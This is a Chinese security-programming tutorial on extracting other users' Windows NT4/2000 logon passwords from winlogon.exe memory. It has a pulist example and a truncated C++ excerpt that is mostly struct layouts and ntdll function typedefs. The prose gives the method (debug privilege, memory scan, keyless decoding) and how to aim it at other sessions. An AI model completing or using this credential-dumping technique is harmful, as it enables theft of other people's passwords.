
VisualC++信息安全编程(5)获取windows登陆账户密码

winlogon.exe(Windows Logon Process)是 Windows NT 系列的用户登录进程,负责管理用户的登录和注销。
 
因为登录时使用的域名和用户名是以明文保存在 winlogon 进程内存中的,而原程序只查找运行它的那个用户的口令——它先从环境变量取得当前用户名和域名(下面 <行号: …> 形式的片段摘自原程序的对应行):
<167-174:    GetEnvironmentVariableW(L"USERNAME", UserName, 0x400);
    GetEnvironmentVariableW (L"USERDOMAIN", UserDomain, 0x400);
>,然后在 winlogon 进程的地址空间中逐页查找与 UserName 和 UserDomain 相匹配的字符串(原文件第 590 行附近):
// 在 WinLogon 的内存空间中寻找 UserName 和 DomainName 的字符串
if ((wcscmp ((wchar_t *) RealStartingAddressP, UserName) == 0)
&&
(wcscmp ((wchar_t *) ((DWORD) RealStartingAddressP + USER_DOMAIN_OFFSET_WIN2K), UserDomain) == 0))
> ,找到后再读取紧跟在它后面的、经过编码的口令。注意这只是可逆的编码而不是真正的加密:从代码中声明的 RtlRunDecodeUnicodeString 以及 ENCODED_PASSWORD_INFO 中的 HashByte/EncodedPassword 字段可以推断,无需任何密钥即可还原出明文口令。
 
其实只要自己指定用户名和 winlogon 进程去查找就行了:只要你是管理员(代码通过 AddDebugPrivilege 申请调试特权 SeDebugPrivilege,才能读取以 NT AUTHORITY\SYSTEM 身份运行的 winlogon 进程内存),任何在本机通过 msgina.dll 图形登录的用户口令都可以找到。需要注意,本文代码只针对 Windows NT 4 / Windows 2000(见 IsWinNT/IsWin2K 的版本判断和 *_WIN2K 偏移常量),其中硬编码的结构偏移在其他 Windows 版本上很可能不适用。
 
1. 用 pulist 列出进程,找出系统中已登录会话的域名和用户名,以及每个会话对应的 winlogon.exe 进程 ID(下面的示例里有三个 winlogon.exe:PID 188、2416、1876;从 clovea 和 bingle 会话中的 rdpclip.exe 可推断这两个是终端服务/远程桌面会话);
2. 然后对每个 winlogon 进程 ID,按指定的用户名和域名(而不是原程序那样从环境变量读取的当前用户)在其内存中查找即可。
 
example:
 
C:\Documents and Settings\bingle>pulist
Process           PID  User
Idle              0
System            8
smss.exe          164  NT AUTHORITY\SYSTEM
csrss.exe         192  NT AUTHORITY\SYSTEM
winlogon.exe      188  NT AUTHORITY\SYSTEM
wins.exe          1212 NT AUTHORITY\SYSTEM
Explorer.exe      388  TEST-2KSERVER\Administrator
internat.exe      1828 TEST-2KSERVER\Administrator
conime.exe        1868 TEST-2KSERVER\Administrator
msiexec.exe       1904 NT AUTHORITY\SYSTEM
tlntsvr.exe       1048 NT AUTHORITY\SYSTEM
taskmgr.exe       1752 TEST-2KSERVER\Administrator
csrss.exe         2056 NT AUTHORITY\SYSTEM
winlogon.exe      2416 NT AUTHORITY\SYSTEM
rdpclip.exe       2448 TEST-2KSERVER\clovea
Explorer.exe      2408 TEST-2KSERVER\clovea
internat.exe      1480 TEST-2KSERVER\clovea
cmd.exe           2508 TEST-2KSERVER\Administrator
ntshell.exe       368  TEST-2KSERVER\Administrator
ntshell.exe       1548 TEST-2KSERVER\Administrator
ntshell.exe       1504 TEST-2KSERVER\Administrator
csrss.exe         1088 NT AUTHORITY\SYSTEM
winlogon.exe      1876 NT AUTHORITY\SYSTEM
rdpclip.exe       1680 TEST-2KSERVER\bingle
Explorer.exe      2244 TEST-2KSERVER\bingle
conime.exe        2288 TEST-2KSERVER\bingle
internat.exe      1592 TEST-2KSERVER\bingle
cmd.exe           1692 TEST-2KSERVER\bingle
mdm.exe           2476 TEST-2KSERVER\bingle
taskmgr.exe       752  TEST-2KSERVER\bingle
pulist.exe        2532 TEST-2KSERVER\bingle
 
 
 
 
 
 
 
具体实现代码如下
 
 
 
 
 
 
#include <windows.h>   
#include <tchar.h>   
#include <stdio.h>   
#include <stdlib.h>   
 
// Counted UTF-16 string used by the native (ntdll) API; this mirrors the
// Windows UNICODE_STRING layout so that ENCODED_PASSWORD_INFO below can be
// overlaid on winlogon memory and passed to RtlRunDecodeUnicodeString.
// NOTE(review): Buffer is a pointer taken from another process's address
// space -- it is not directly dereferenceable here; how the full source reads
// it back is outside this excerpt.
typedef struct _UNICODE_STRING  
{  
    USHORT Length;  
    USHORT MaximumLength;  
    PWSTR Buffer;  
} UNICODE_STRING, *PUNICODE_STRING;  
 
// Undocumented typedef's   
// The structures below are overlays on undocumented Windows NT 4 / 2000
// data returned by the native API. Field order and width are the whole
// contract: do not reorder, pad or retype them. All "handle"/address fields
// are declared DWORD, so the layouts are only valid for a 32-bit build.

// One handle record as returned by NtQuerySystemInformation (presumably
// the handle-information class; the query itself is not in this excerpt).
typedef struct _QUERY_SYSTEM_INFORMATION  
{  
    DWORD GrantedAccess;  
    DWORD PID;  
    WORD HandleType;  
    WORD HandleId;  
    DWORD Handle;  
} QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION;  
// Header preceding an array of PROCESS_INFO records. Only Count is
// understood; Unk04/Unk08 are unknown and named by their byte offset.
typedef struct _PROCESS_INFO_HEADER  
{  
    DWORD Count;  
    DWORD Unk04;  
    DWORD Unk08;  
} PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER;  
// One record from the debug buffer filled by RtlQueryProcessDebugInformation.
// From the LoadAddress/Size/Name fields it looks like a per-module entry
// (load address, image size, ANSI module name) -- confirm against the full
// source. Unk* fields are unknown and named by their byte offset.
typedef struct _PROCESS_INFO  
{  
    DWORD LoadAddress;  
    DWORD Size;  
    DWORD Unk08;  
    DWORD Enumerator;  
    DWORD Unk10;  
    char Name [0x108];  /* 0x108 bytes; NUL-termination not guaranteed by this layout */
} PROCESS_INFO, *PPROCESS_INFO;  
// Overlay for the block winlogon keeps next to the logged-on user's
// credentials (NT 4 / 2000 layout). Unk* fields are unknown and named by
// their byte offset.
//
// Security note: EncodedPassword is not encrypted, only obfuscated. The tool
// declares RtlRunDecodeUnicodeString (BYTE, PUNICODE_STRING), which -- going
// by the names -- reverses the encoding in place using a one-byte seed,
// presumably the low byte of HashByte (the call site is not in this excerpt).
// No key is required, so anyone who can read winlogon's memory (SeDebugPrivilege,
// i.e. an administrator) recovers the cleartext.
typedef struct _ENCODED_PASSWORD_INFO  
{  
    DWORD HashByte;        // seed for RtlRunDecodeUnicodeString; only a BYTE is consumed (see typedef)
    DWORD Unk04;  
    DWORD Unk08;  
    DWORD Unk0C;  
    FILETIME LoggedOn;     // logon time, 8 bytes at offset 0x10
    DWORD Unk18;  
    DWORD Unk1C;  
    DWORD Unk20;  
    DWORD Unk24;  
    DWORD Unk28;  
    UNICODE_STRING EncodedPassword;  // at offset 0x2C; Buffer points into winlogon's address space
} ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO;  
 
// Function-pointer types for the undocumented ntdll exports the tool resolves
// at run time (the GetProcAddress lookups are not in this excerpt). None of
// these are part of the supported Win32 API and their behaviour differs
// between Windows versions.
// NOTE(review): every HANDLE/pointer-sized argument is declared as DWORD, so
// these signatures are only correct for a 32-bit build; they would truncate
// on x64.
typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION)  (DWORD, PVOID, DWORD, PDWORD);  
typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD);  
typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID);  
typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID);  
// Decodes a UNICODE_STRING in place using a one-byte seed; presumably fed
// ENCODED_PASSWORD_INFO.HashByte and EncodedPassword (call site not shown).
typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING)  (BYTE, PUNICODE_STRING);  
 
// Private Prototypes   
// The tool has two code paths selected by OS version: the password block
// layout and the USER_DOMAIN_OFFSET_* constants differ between NT 4 and 2000.
BOOL IsWinNT (void);                          // running on Windows NT 4?
BOOL IsWin2K (void);                          // running on Windows 2000?
BOOL AddDebugPrivilege (void);                // enable SeDebugPrivilege; needed to open the SYSTEM-owned winlogon process
DWORD FindWinLogon (void);                    // returns a winlogon.exe PID (presumably the first found; one per session exists)
BOOL LocatePasswordPageWinNT (DWORD, PDWORD); // (PID, out address) -- scan winlogon memory for the user/domain strings
BOOL LocatePasswordPageWin2K (DWORD, PDWORD);  
void DisplayPasswordWinNT (void);             // decode and print; uses the globals below
void DisplayPasswordWin2K (void);  
 
// Global Variables   
// Resolved ntdll entry points (filled in elsewhere in the file; unchecked
// NULL here would crash -- confirm the loader path tests GetProcAddress).
PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation;  
PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer;  
PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation;  
PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer;  
PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString;  

// Result of the memory scan, shared between Locate* and Display*.
// NOTE(review): the recovered password is kept in process memory in the
// clear; nothing in this excerpt zeroes it afterwards.
DWORD PasswordLength = 0;     // length of the located password (units not shown here -- bytes vs. characters, TODO confirm)
PVOID RealPasswordP = NULL;   // address of the password inside winlogon's address space
PVOID